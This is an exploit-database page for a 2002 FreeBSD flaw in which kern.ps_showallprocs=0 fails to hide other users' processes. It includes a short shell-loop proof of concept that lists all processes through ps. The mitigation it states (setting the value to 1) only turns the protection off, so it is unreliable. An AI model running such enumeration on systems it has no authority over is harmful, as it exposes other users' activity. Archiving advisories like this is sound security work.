header-logo
Suggest Exploit
vendor:
FreeBSD
by:
SecurityFocus
7.2
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: FreeBSD
Affected Version From: FreeBSD 4.0
Affected Version To: FreeBSD 4.7
Patch Exists: YES
Related CWE: N/A
CPE: o:freebsd:freebsd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix-like
2002

In FreeBSD, setting kern.ps_showallprocs=0 via the sysctl call is meant to disable normal users from seeing any running processes that are not owned by them

The current implementation of this feature fails to protest system process information. It is still possible to obtain a list of processes from a procfs filesystem, or from specifying certain options to the 'ps' command. The exploit code provided in the text can be used to list all the processes running on the system.

Mitigation:

Ensure that kern.ps_showallprocs is set to 1.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4768/info

In FreeBSD, setting kern.ps_showallprocs=0 via the sysctl call is meant to disable normal users from seeing any running processes that are not owned by them. The current implementation of this feature fails to protest system process information.

It is still possible to obtain a list of processes from a procfs filesystem, or from specifying certain options to the 'ps' command.

#!/bin/sh
pid=0;
while x=0; do
/bin/ps -auxwwwp $pid | /usr/bin/grep $pid;
pid=`expr $pid + 1`;
done

Navigation

Suggest Exploit

Services By CQR